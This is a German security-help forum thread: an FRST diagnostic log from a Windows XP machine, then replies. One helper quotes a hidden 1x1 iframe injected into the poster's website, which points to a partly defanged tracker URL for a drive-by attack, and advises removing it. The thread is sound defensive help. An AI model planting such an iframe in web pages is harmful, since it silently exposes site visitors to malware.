Flatcast Viewer Plugin 5.3.0.784 (HKLM\...\Flatcast Viewer 5.3_is1) (Version: - 1 mal 1 Software GmbH)
High Definition Audio Driver Package - KB888111 (HKLM\...\KB888111WXPSP2) (Version: 20040219.000000 - Microsoft Corporation)
Hotfix für Windows Media Player 11 (KB939683) (HKLM\...\KB939683) (Version: - Microsoft Corporation)
Hotfix für Windows XP (KB952287) (HKLM\...\KB952287) (Version: 1 - Microsoft Corporation)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
K-Lite Codec Pack 11.0.0 Full (HKLM\...\KLiteCodecPack_is1) (Version: 11.0.0 - )
Malwarebytes Anti-Malware Version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mp3tag v2.46a (HKLM\...\Mp3tag) (Version: v2.46a - Florian Heidenreich)
Opera Stable 28.0.1750.51 (HKLM\...\Opera 28.0.1750.51) (Version: 28.0.1750.51 - Opera Software ASA)
PhotoScape (HKLM\...\PhotoScape) (Version: - )
REALTEK GbE & FE Ethernet PCI-E NIC Driver (HKLM\...\{C9BED750-1211-4480-B1A5-718A3BE15525}) (Version: 1.24.0000 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 5.10.0.5730 - Realtek Semiconductor Corp.)
Sicherheitsupdate für Microsoft Windows (KB2564958) (HKLM\...\KB2564958) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2510531) (HKLM\...\KB2510531-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2909210) (HKLM\...\KB2909210-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2909921) (HKLM\...\KB2909921-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2936068) (HKLM\...\KB2936068-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2964358) (HKLM\...\KB2964358-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB982381) (HKLM\...\KB982381-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2378111) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player (KB2803821-v2) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player (KB2834904-v2) (HKLM\...\KB2834904-v2_WM11) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB952069) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player (KB954155) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player (KB973540) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player (KB975558) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player (KB978695) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player 11 (KB954154) (HKLM\...\KB954154_WM11) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2115168) (HKLM\...\KB2115168) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2229593) (HKLM\...\KB2229593) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2296011) (HKLM\...\KB2296011) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2347290) (HKLM\...\KB2347290) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2387149) (HKLM\...\KB2387149) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2393802) (HKLM\...\KB2393802) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2419632) (HKLM\...\KB2419632) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2423089) (HKLM\...\KB2423089) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2443105) (HKLM\...\KB2443105) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2478960) (HKLM\...\KB2478960) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2478971) (HKLM\...\KB2478971) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2479943) (HKLM\...\KB2479943) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2481109) (HKLM\...\KB2481109) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2483185) (HKLM\...\KB2483185) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2485663) (HKLM\...\KB2485663) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2506212) (HKLM\...\KB2506212) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2507938) (HKLM\...\KB2507938) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2508429) (HKLM\...\KB2508429) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2509553) (HKLM\...\KB2509553) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2510581) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB2535512) (HKLM\...\KB2535512) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2536276-v2) (HKLM\...\KB2536276-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2544893-v2) (HKLM\...\KB2544893-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2566454) (HKLM\...\KB2566454) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2570947) (HKLM\...\KB2570947) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2584146) (HKLM\...\KB2584146) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2585542) (HKLM\...\KB2585542) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2592799) (HKLM\...\KB2592799) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2598479) (HKLM\...\KB2598479) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2603381) (HKLM\...\KB2603381) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2619339) (HKLM\...\KB2619339) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2620712) (HKLM\...\KB2620712) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2631813) (HKLM\...\KB2631813) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2653956) (HKLM\...\KB2653956) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2655992) (HKLM\...\KB2655992) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2659262) (HKLM\...\KB2659262) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2661637) (HKLM\...\KB2661637) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2676562) (HKLM\...\KB2676562) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2686509) (HKLM\...\KB2686509) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2691442) (HKLM\...\KB2691442) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2698365) (HKLM\...\KB2698365) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2705219-v2) (HKLM\...\KB2705219-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2712808) (HKLM\...\KB2712808) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2719985) (HKLM\...\KB2719985) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2723135-v2) (HKLM\...\KB2723135-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2727528) (HKLM\...\KB2727528) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2757638) (HKLM\...\KB2757638) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2770660) (HKLM\...\KB2770660) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2780091) (HKLM\...\KB2780091) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2802968) (HKLM\...\KB2802968) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2807986) (HKLM\...\KB2807986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2813345) (HKLM\...\KB2813345) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2820917) (HKLM\...\KB2820917) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2834886) (HKLM\...\KB2834886) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2847311) (HKLM\...\KB2847311) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2850869) (HKLM\...\KB2850869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2859537) (HKLM\...\KB2859537) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862152) (HKLM\...\KB2862152) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862330) (HKLM\...\KB2862330) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862335) (HKLM\...\KB2862335) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2864063) (HKLM\...\KB2864063) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2868038) (HKLM\...\KB2868038) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2868626) (HKLM\...\KB2868626) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876217) (HKLM\...\KB2876217) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876331) (HKLM\...\KB2876331) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2892075) (HKLM\...\KB2892075) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2893294) (HKLM\...\KB2893294) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2898715) (HKLM\...\KB2898715) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2900986) (HKLM\...\KB2900986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2909212) (HKLM\...\KB2909212) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2914368) (HKLM\...\KB2914368) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2916036) (HKLM\...\KB2916036) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2922229) (HKLM\...\KB2922229) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2929961) (HKLM\...\KB2929961) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2930275) (HKLM\...\KB2930275) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2936068) (HKLM\...\KB2936068) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2964358) (HKLM\...\KB2964358) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923561) (HKLM\...\KB923561) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923789) (HKLM\...\KB923789) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB941569) (HKLM\...\KB941569) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB946648) (HKLM\...\KB946648) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950762) (HKLM\...\KB950762) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950974) (HKLM\...\KB950974) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951376-v2) (HKLM\...\KB951376-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB952004) (HKLM\...\KB952004) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB952954) (HKLM\...\KB952954) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956572) (HKLM\...\KB956572) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956844) (HKLM\...\KB956844) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB959426) (HKLM\...\KB959426) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960803) (HKLM\...\KB960803) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960859) (HKLM\...\KB960859) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB969059) (HKLM\...\KB969059) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB970430) (HKLM\...\KB970430) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971657) (HKLM\...\KB971657) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB972270) (HKLM\...\KB972270) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973507) (HKLM\...\KB973507) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973869) (HKLM\...\KB973869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973904) (HKLM\...\KB973904) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974112) (HKLM\...\KB974112) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974318) (HKLM\...\KB974318) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974392) (HKLM\...\KB974392) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974571) (HKLM\...\KB974571) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975025) (HKLM\...\KB975025) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975467) (HKLM\...\KB975467) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975560) (HKLM\...\KB975560) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975713) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB977816) (HKLM\...\KB977816) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB977914) (HKLM\...\KB977914) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978338) (HKLM\...\KB978338) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978542) (HKLM\...\KB978542) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978706) (HKLM\...\KB978706) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979309) (HKLM\...\KB979309) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979482) (HKLM\...\KB979482) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979687) (HKLM\...\KB979687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981997) (HKLM\...\KB981997) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982132) (HKLM\...\KB982132) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982665) (HKLM\...\KB982665) (Version: 1 - Microsoft Corporation)
Skype™ 7.3 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.3.101 - Skype Technologies S.A.)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM\...\TeamViewer) (Version: 10.0.39052 - TeamViewer)
Ulead GIF Animator 5 Trial (HKLM\...\{8AF3E926-ED59-11D4-A44B-0000E86D2305}) (Version: - Ulead System)
Update für Windows Internet Explorer 8 (KB2598845) (HKLM\...\KB2598845-IE8) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2934207) (HKLM\...\KB2934207) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB898461) (HKLM\...\KB898461) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update für Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version: - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version: - )
Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031514 - Microsoft Corporation)
WinMX 2.6D Deutsch <~>®¥©<>Chatterclub<>©¥®<~> Edition (HKLM\...\WinMX 2.6D Deutsch <~>®¥©<>Chatterclub<>©¥®<~> Edition_is1) (Version: - OTH)
WinRAR 5.21 (32-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Xvid Video Codec (HKLM\...\Xvid Video Codec 1.3.3) (Version: 1.3.3 - Xvid Team)
ZaraRadio 1.6.1 (HKLM\...\ZaraRadio_is1) (Version: - ZaraSoft)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points =========================

18-03-2015 18:47:25 Systemprüfpunkt
18-03-2015 18:51:35 Installiert Realtek High Definition Audio Driver
18-03-2015 18:51:46 Installed Windows XP KB888111WXPSP2.
18-03-2015 18:55:09 Installiert REALTEK GbE & FE Ethernet PCI-E NIC Driver
18-03-2015 19:27:30 Windows XP Service Pack 3 wurde installiert.
18-03-2015 19:51:39 Software Distribution Service 3.0
18-03-2015 20:04:37 Software Distribution Service 3.0
18-03-2015 20:24:16 Windows XP WgaNotify wurde installiert.
18-03-2015 20:26:23 Software Distribution Service 3.0
18-03-2015 20:32:06 avast! antivirus system restore point
18-03-2015 20:34:36 Software Distribution Service 3.0
20-03-2015 15:51:29 Installed Xara3D6
20-03-2015 16:00:35 Installed Xara3D6
20-03-2015 16:14:00 Installed Xara3D6
20-03-2015 16:20:41 Installed Xara3D6
21-03-2015 19:22:48 Systemprüfpunkt
26-03-2015 11:39:59 Installed Windows Media Player 11
26-03-2015 11:40:20 Software Distribution Service 3.0
27-03-2015 12:18:02 Software Distribution Service 3.0
27-03-2015 12:57:07 avast! antivirus system restore point
27-03-2015 13:03:37 Software Distribution Service 3.0
28-03-2015 14:34:57 Systemprüfpunkt
29-03-2015 14:48:09 Systemprüfpunkt
31-03-2015 15:33:56 Systemprüfpunkt
02-04-2015 14:41:18 Systemprüfpunkt
04-04-2015 10:23:43 Systemprüfpunkt
05-04-2015 12:52:34 Systemprüfpunkt
06-04-2015 15:36:54 Systemprüfpunkt
09-04-2015 11:07:44 Systemprüfpunkt
11-04-2015 09:29:02 Systemprüfpunkt
12-04-2015 14:14:46 Software Distribution Service 3.0
13-04-2015 17:03:01 Systemprüfpunkt
15-04-2015 09:06:57 Software Distribution Service 3.0
16-04-2015 09:25:17 avast! antivirus system restore point
20-04-2015 19:05:41 Systemprüfpunkt
22-04-2015 15:18:40 Systemprüfpunkt
23-04-2015 11:45:52 Installed Ulead GIF Animator
24-04-2015 13:07:19 Systemprüfpunkt

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-02-28 14:00 - 2006-02-28 14:00 - 00000820 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_17_0_0_169_pepper.exe
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\avast! Emergency Update.job => C:\Programme\AVAST Software\Avast\AvastEmUpdate.exe
Task: C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Benachrichtigung – Anmeldung.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Monatliche Benachrichtigung.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1426704743.job => C:\Programme\Opera\launcher.exe
Task: C:\WINDOWS\Tasks\User_Feed_Synchronization-{C3282EEF-4ECE-428A-A266-FD297A3BF13F}.job => C:\WINDOWS\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) ==============

2015-03-18 20:32 - 2015-03-27 12:58 - 00104400 _____ () C:\Programme\AVAST Software\Avast\log.dll
2015-03-18 20:32 - 2015-03-27 12:58 - 00081728 _____ () C:\Programme\AVAST Software\Avast\JsonRpcServer.dll
2015-04-25 08:26 - 2015-04-25 08:26 - 02927104 _____ () C:\Programme\AVAST Software\Avast\defs\15042401\algo.dll
2015-04-25 12:28 - 2015-04-25 12:28 - 02927104 _____ () C:\Programme\AVAST Software\Avast\defs\15042500\algo.dll
2015-03-18 20:32 - 2015-03-18 20:32 - 40540672 _____ () C:\Programme\AVAST Software\Avast\libcef.dll
2015-04-08 22:07 - 2015-04-07 09:13 - 00484472 _____ () C:\Programme\Opera\28.0.1750.51_1\opera_crashreporter.exe
2015-04-08 22:07 - 2015-04-07 09:13 - 09625720 _____ () C:\Programme\Opera\28.0.1750.51_1\pdf.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, the associated entry will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1214440339-764733703-839522115-500\Control Panel\Desktop\\Wallpaper -> C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Anwendungsdaten\Microsoft\Wallpaper1.bmp
DNS Servers: 192.168.0.1 - 192.168.0.2

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/11/2015 10:33:10 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Stillstehende Anwendung PushToTalk 2015 Setup.exe, Version 10.0.30319.1, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.

Error: (04/03/2015 03:35:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung mbamservice.exe, Version 3.0.32.0, fehlgeschlagenes Modul mbamservice.exe, Version 3.0.32.0, Fehleradresse 0x000035dc.
Das medienspezifische Ereignis für [mbamservice.exe!ws!] wird verarbeitet.

Error: (03/27/2015 01:07:19 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Stillstehende Anwendung AvastUI.exe, Version 10.2.2215.880, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.

Error: (03/26/2015 11:49:14 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Stillstehende Anwendung WMPAU.exe, Version 11.0.5721.5146, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.


System errors:
=============
Error: (04/25/2015 00:28:13 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/22/2015 09:09:28 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/16/2015 09:27:40 AM) (Source: 0) (EventID: 1) (User: )
Description: 0xC0000043HarddiskVolume1

Error: (04/13/2015 08:54:36 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/12/2015 02:10:19 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/09/2015 00:08:20 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/05/2015 09:06:25 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/03/2015 03:36:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MBAMService" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/02/2015 10:09:37 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.

Error: (04/01/2015 09:10:07 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst MBAMService.


Microsoft Office Sessions:
=========================
Error: (04/11/2015 10:33:10 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: PushToTalk 2015 Setup.exe10.0.30319.1hungapp0.0.0.000000000

Error: (04/03/2015 03:35:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: mbamservice.exe3.0.32.0mbamservice.exe3.0.32.0000035dc

Error: (03/27/2015 01:07:19 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: AvastUI.exe10.2.2215.880hungapp0.0.0.000000000

Error: (03/26/2015 11:49:14 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: WMPAU.exe11.0.5721.5146hungapp0.0.0.000000000


==================== Memory info ===========================

Processor: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Percentage of memory in use: 29%
Total physical RAM: 3325.01 MB
Available physical RAM: 2347.19 MB
Total Pagefile: 5213.9 MB
Available Pagefile: 4289.61 MB
Total Virtual: 2047.88 MB
Available Virtual: 1936.76 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:279.45 GB) (Free:254.42 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 279.5 GB) (Disk ID: E651E651)
Partition 1: (Active) - (Size=279.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================
--- --- ---

schrauber 25.04.2015 13:00
Hi,

XP???? Wirklich?

Ich seh so nix, am Besten Avast Support anschreiben.

Da GuRu 25.04.2015 17:00
Hi,

auf der Seite wird ein IFrame eingebunden für eine DriveBy Attacke

Code:
iframe src="h**p://dagek.voluumtrk.***/fe587213-b13b-456d-9775-1556453da8fa" width="1" height="1" border="0" >

schrauber 25.04.2015 17:05
nicht verzagen, Guru fragen :D

nemo33701 25.04.2015 21:12
danke, aber was kann ich nun dagegen machen

schrauber 26.04.2015 17:58
Du musst es aus dem Code deiner Seite entfernen.


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:23 Uhr.

